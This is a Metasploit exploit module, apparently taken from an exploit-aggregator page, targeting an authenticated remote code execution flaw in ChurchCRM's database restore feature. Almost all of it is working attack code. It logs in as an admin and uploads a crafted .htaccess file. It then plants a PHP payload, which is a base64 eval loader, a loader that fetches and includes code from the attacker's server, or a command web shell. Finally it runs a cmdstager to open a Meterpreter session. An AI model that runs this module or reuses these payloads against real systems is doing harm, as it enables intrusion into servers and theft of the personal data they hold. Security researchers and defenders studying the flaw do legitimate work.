## https://sploitus.com/exploit?id=MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ChurchCRM Database Restore RCE 6.2.0',
'Description' => %q{
This module exploits a Remote Code Execution (RCE) vulnerability in ChurchCRM
versions prior to 6.2.0. The vulnerability resides in the Database Restore
functionality, which allows an authenticated user with administrative privileges
to upload a malicious backup file. By bypassing upload restrictions via a
crafted .htaccess file, the module enables PHP code execution in the target
directory, ultimately providing the attacker with a Meterpreter shell.
},
'License' => MSF_LICENSE,
'Author' => ['LucasCsmt'],
'References' => [
[ 'GHSA', 'pqm7-g8px-9r77'],
[ 'CVE', '2025-68109']
],
'Platform' => ['linux', 'php'],
'Targets' => [
[
'Linux/unix Command (CmdStager)',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => ['linux'],
'Type' => :nix_cmdstager,
'CmdStagerFlavor' => [
'printf', 'echo', 'bourne', 'fetch', 'curl', 'wget'
]
}
],
[
'PHP (In-Memory)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_memory
}
],
[
'PHP (Fetch)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_fetch
}
],
],
'DisclosureDate' => '2025-12-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Username for the admin account', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the admin account', nil])
]
)
end
# Check if the target is up by accessing the login page
def check
vprint_status('Checking if the target is reachable...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'session', 'begin')
})
unless [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Unknown("Unexpected HTTP response code: #{res.code}")
end
version = res.headers['CRM-VERSION']
if version
print_status("Found ChurchCRM version: #{version}")
if Rex::Version.new(version) < Rex::Version.new('6.5.3')
return Exploit::CheckCode::Appears("Vulnerable version #{version} detected via CRM-VERSION header.")
else
return Exploit::CheckCode::Safe("Version #{version} is not vulnerable.")
end
end
if res.body.include?('ChurchCRM')
return Exploit::CheckCode::Detected('ChurchCRM detected, but the version could not be determined.')
end
Exploit::CheckCode::Safe('The target does not appear to be ChurchCRM.')
end
# Build the payload that will be into the installation form
#
# @return : the payload
def build_payload
case target['Type']
when :php_memory
b64_payload = Rex::Text.encode_base64(payload.encoded)
"<?php eval(base64_decode(\"#{b64_payload}\")); ?>"
when :php_fetch
payload_name = '/tmp/' + rand_text_alpha(5..10) + '.php'
"<?php $f='#{payload_name}'; file_put_contents($f, file_get_contents('#{get_uri}')); register_shutdown_function('unlink', $f); include($f); ?>"
else
"<?php if(isset($_GET['cmd'])){system($_GET['cmd'].' 2>&1');} ?>"
end
end
# Get the session cookie of the specified user
#
# @return : the session cookie
def get_cookie
print_status 'Getting the session cookie'
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'session', 'begin'),
'vars_post' => {
'User' => datastore['USERNAME'],
'Password' => datastore['PASSWORD']
}
})
fail_with(Failure::Unreachable, 'No answer from the server') unless res
fail_with(Failure::NoAccess, 'Authentication error : Invalid login or password') if res.body.include?('Invalid login or password')
fail_with(Failure::NoAccess, 'Authentication error : This account have been locked') if res.body.include?('Too many failed logins')
fail_with(Failure::UnexpectedReply, "Invalid status code : #{res.code}") unless [200, 301, 302].include?(res.code)
cookie = res.get_cookies
fail_with(Failure::UnexpectedReply, 'No cookies found') if cookie.blank?
print_good 'The session cookie has been received'
cookie
end
# Handles the incoming HTTP request and serves the payload to the target.
def on_request_uri(cli, _request)
p = payload.encoded
send_response(cli, p, {
'Content-Type' => 'application/x-httpd-php',
'Pragma' => 'no-cache'
})
end
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'tmp_attach', 'ChurchCRMBackups', @payload_name),
'vars_get' => { 'cmd' => cmd }
})
end
# Upload a file exploiting the database resotre functionality
#
# @param : file_name, the name of the file to upload
# @param : content, the content of the file to upload
def upload_file(file_name, content)
print_status "Uploading the file : #{file_name}"
data = Rex::MIME::Message.new
data.add_part(
content,
'application/octet-stream',
nil,
"form-data; name=\"restoreFile\"; filename=\"#{file_name}\""
)
data.add_part('', nil, nil, 'form-data; name="restorePassword"')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'database', 'restore'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => @cookie
})
fail_with(Failure::Unreachable, 'No answer from the server') unless res
# The server returns a 500 error because the uploaded file is not a valid backup file, but the file is still uploaded before the crash.
fail_with(Failure::NotVulnerable, 'Invalid status code, the target may not be vulnerable') unless res.code == 500
print_good 'The file have been uploaded successfully'
end
# Execute the payload
def execute_payload
print_status 'Trying to execute the payload'
if target['Type'] == :nix_cmdstager
execute_cmdstager(
linemax: 500,
nodelete: false,
background: true,
temp: '/tmp'
)
else
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'tmp_attach', 'ChurchCRMBackups', @payload_name)
})
end
print_good 'Payload successfully executed'
end
def exploit
if target['Type'] == :php_fetch
print_status('Starting HTTP server to serve the payload...')
start_service
end
@cookie = get_cookie
upload_file '.htaccess', "Allow from all\n"
register_file_for_cleanup('.htaccess')
@payload_name = rand_text_alpha(5..10) + '.php'
upload_file @payload_name, build_payload
register_file_for_cleanup(@payload_name)
execute_payload
end
end